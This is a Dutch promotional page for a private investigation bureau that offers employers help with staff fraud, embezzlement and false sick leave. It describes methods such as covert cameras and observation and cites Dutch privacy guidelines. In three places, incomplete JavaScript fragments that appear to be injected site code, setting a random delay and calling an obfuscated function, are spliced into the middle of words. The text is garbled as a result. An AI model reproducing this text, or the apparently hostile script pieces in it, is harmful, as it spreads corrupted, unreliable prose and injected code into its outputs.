Fraude binnen uw bedrijf: Nachtmerrie voor elke ondernemer!

Bedrijfsrecherche Correct Groep

Heeft u het weleens meegemaakt? Het gevoel dat er iets niet klopt….. Natuurlijk, u vertrouwt uw medewerkers….maar toch…. We lezen er regelmatig over: frauderende medewerkers. En voor al die ondernemers die denken “Mij overkomt het niet”: Het overkomt ons allemaal in meer of mindere mate. Met grote en vervelende gevolgen.

Diefstal en verduistering, onterechte ziekmeldingen, vertegenwoordigers en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere buitendienst-medewerkers die hun werktijd gebruiken voor andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere zaken, men deinst er niet voor terug. De werkgever en de “integere” collega’s zijn de dupe. De mensen vertrouwen elkaar niet meer, verdenken elkaar en de werksfeer gaat in no time kapot. Bij constatering van dergelijke zaken komt het regelmatig voor dat er niet of nauwelijks actie wordt ondernomen. Omdat men stiekem hoopt dat dit wangedrag vanzelf stopt of omdat men simpelweg geen idee heeft hoe men dit kan aanpakken. Hoe kom je erachter wie dit doet en hoe ga je te werk?

Recherchebureau Correct

Recherchebureau Correct heeft jarenlange ervaring hiermee en staat u graag terzijde! Eerst komen wij bij u langs voor een kosteloze intake. Wij gaan met u in gesprek om naar u te luisteren en het probleem goed in kaart te krijgen. Tijdens het gesprek stellen wij vast of er sprake is van een gerechtvaardigd belang. Als hier sprake van is en de zaak is goed in beeld, dan werken wij een uitgebreid voorstel voor u uit.

In dit voorstel wordt de casus omschreven en de onderzoeksmethode beschreven. De werkwijze is dan al door ons getoetst aan het proportionaliteits- en subsidiariteitsbeginsel, wat inhoudt dat deze in verhouding moet staan tot het te behalen doel. Tevens moet het de lichtst mogelijke methode zijn om de waarheid te achterhalen. In ons voorstel wordt ook de wijze en frequentie van rapporteren benoemd. Het is natuurlijk van groot belang dat u gedurende het onderzoek op de hoogte wordt gehouden.

Gebruikte methoden

Het feitelijke onderzoek kan, afhankelijk van de zaak, bestaan uit diverse methodieken. Denk hierbij bijvoorbeeld aan:

  • Het plaatsen van heimelijke camera-apparatuur en verwerken van de beelden;
  • Onderzoek in open bronnen op internet;
  • Het observeren van personen;
  • Het doen van proefaankopen;
  • Uitvoeren van buurtonderzoek;
  • Het voeren van confrontatiegesprekken met onderzochte personen.

Waarborging van privacy

Natuurlijk is het heel belangrijk dat rekening wordt gehouden met de privacy van personen. De richtlijnen voor het uitvoeren van een onderzoek staan omschreven in de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche, sector Particuliere Onderzoeksbureaus.

Recherchebureau Correct is houder van het Keurmerk van de Branchevereniging voor Particuliere Onderzoeksbureaus. Dit houdt in dat er jaarlijks een onafhankelijke toetsing plaatsvindt of de richtlijnen wel naar behoren worden gevolgd en of aan alle wettelijke eisen wordt voldaan.

Meer weten?

Bij Recherchebureau Correct bent u dus aan het juiste adres als u een einde wilt maken aan fraude, verduistering en diefstal binnen uw bedrijf. Bij twijfel: Bel ons! Wij komen graag vrijblijvend bij u langs!